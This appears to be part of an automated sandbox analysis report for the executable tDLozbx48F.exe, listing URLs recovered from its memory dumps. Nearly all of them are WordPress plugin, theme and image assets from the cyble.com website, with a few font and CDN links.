Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.25.10
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/lib/animations/styles/fadeIn.min.css?ver=3.25.
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css?ver=5.15.3
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.css?ver=5.15.
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.css?ver=5.15.3
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=19.6.4
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/gutenberg/build/dom-ready/index.min.js?ver=222ad38e3e5e302c8bbf
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/gutenberg/build/hooks/index.min.js?ver=84e753e2b66eb7028d38
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/gutenberg/build/i18n/index.min.js?ver=bd5a2533e717a1043151
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=2.0.2
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/_inc/blocks/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/_inc/blocks/subscriptions/view.js?minify=false&ver=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=14.1-a.
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/_inc/build/infinite-scroll/infinity.min.js?ver=14.1-a.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.css?ver=14.1-a.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/modules/carousel/swiper-bundle.css?ver=14.1-a.7
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/modules/infinite-scroll/infinity.css?ver=20140422
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/jetpack/modules/likes/style.css?ver=14.1-a.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/layout-grid/style.css?ver=1643201242
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/link-whisper-premium/js/frontend.min.js?ver=1732561086
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/onesignal-free-web-push-notifications/sdk_files/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css?ver=7.1.1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/lib/isotope/isotope.min.js?ver=1.37.2
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/lib/jquery-element-resize/jquery_resi
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/lib/js-cookie/js_cookie.min.js?ver=1.
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/lib/slick/slick.min.js?ver=1.37.2
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/min-css/uael-frontend.min.css?ver=1.3
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/min-js/uael-nav-menu.min.js?ver=1.37.
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/ultimate-elementor/assets/min-js/uael-posts.min.js?ver=1.37.2
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/unlimited-elements-for-elementor-premium/assets_libraries/filte
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/plugins/unlimited-elements-for-elementor-premium/assets_libraries/font-
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=4.8.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=4.8.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.8.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2021/11/Cyble-Black-Logo-1-2127859258-1637602085949.png
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2021/11/cropped-Cyble-Black-Logo-1-2127859258-1637602085949.png
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence-150x50.png
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence.png</p>
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/01/hawk.png
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/05/favicon-32x32-1.png
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/05/products-img-copy.webp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/07/CyberExpress-logo-icon-2024.png
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/09/favicon-2-1.webp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/2024/11/web-image-04-2.webp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/astra-addon/astra-addon-6748b26df282a9-42838972.css?ver=4.8.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/astra-addon/astra-addon-6748b26e2133f9-18003370.js?ver=4.8.7
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-19102.css?ver=1732561088
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-29234.css?ver=1732561087
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-55787.css?ver=1732561088
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-5708.css?ver=1732561088
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-59717.css?ver=1732561088
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-content/uploads/elementor/css/post-9211.css?ver=1732561089
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/wp-json/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.com/xmlrpc.php?rsd
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cyble.comX
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts-api.wp.com/css?family=Open
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts-api.wp.com/css?family=Poppins%3A400%2C700%2C500%7CRoboto%3A400&display=fallback&#
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getodin.com
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getodin.com/
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gmpg.org/xfn/11
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://greensock.com/club
Source: tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527A7000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B52678000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B527EC000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526E4000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2428626323.0000021B526A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hu-manity.co/
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2021/11/cropped-Cyble-Black-Logo-1-2127859258-1637602
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/01/Cyble-Blogs-Google-Ads.jpg?fit=1024%2C512&amp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/01/Cyble-Blogs-Google-Ads.jpg?fit=1200%2C600&amp
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/01/Cyble-Blogs-Google-Ads.jpg?fit=300%2C150&
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/02/ChatGPT-Phishing.png?fit=1024%2C512&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/02/ChatGPT-Phishing.png?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/02/ChatGPT-Phishing.png?fit=300%2C150&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/03/Cyble-Blogs-Nexus.jpg?fit=1024%2C512&ssl=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/03/Cyble-Blogs-Nexus.jpg?fit=1200%2C600&ssl=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/03/Cyble-Blogs-Nexus.jpg?fit=300%2C150&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/04/AMOS-macOS-Stealer.jpg?fit=1024%2C512&ssl
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/04/AMOS-macOS-Stealer.jpg?fit=1200%2C600&ssl
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/04/AMOS-macOS-Stealer.jpg?fit=300%2C150&ssl=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/06/UmbralStealer-Super-Mario-Bros-Blog.jpg?fit=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2023/06/UmbralStealer-Super-Mario-Bros-Blog.jpg?fit=3
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence.png?fit=300
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence.png?fit=870
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence.png?resize=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cropped-Cyble-Threat-Intelligence.png?w=870&a
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?fit=1000%2C1000&
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?fit=300%2C300&am
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?resize=150%2C150
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?resize=300%2C300
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?resize=768%2C768
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/cyble-hawk-reading-email.jpg?w=1000&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/01/featured-image.jpg
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=1024%2C512&ssl
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=1200%2C600&ssl
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=1200%2C600&ssl=1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CERT-1.jpg?fit=300%2C150&ssl=
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CISA-Read-Teaming.jpg?fit=1024%2C
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CISA-Read-Teaming.jpg?fit=1200%2C
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-CISA-Read-Teaming.jpg?fit=300%2C1
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Counterfeit.png?fit=1024%2C512&am
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Counterfeit.png?fit=1200%2C600&am
Source: tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B6261A000.00000004.00000800.00020000.00000000.sdmp, tDLozbx48F.exe, 0000000E.00000002.2441751941.0000021B626FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://i0.wp.com/cyble.com/wp-content/uploads/2024/11/Cyble-Blogs-Counterfeit.png?fit=1200%2C600&ss
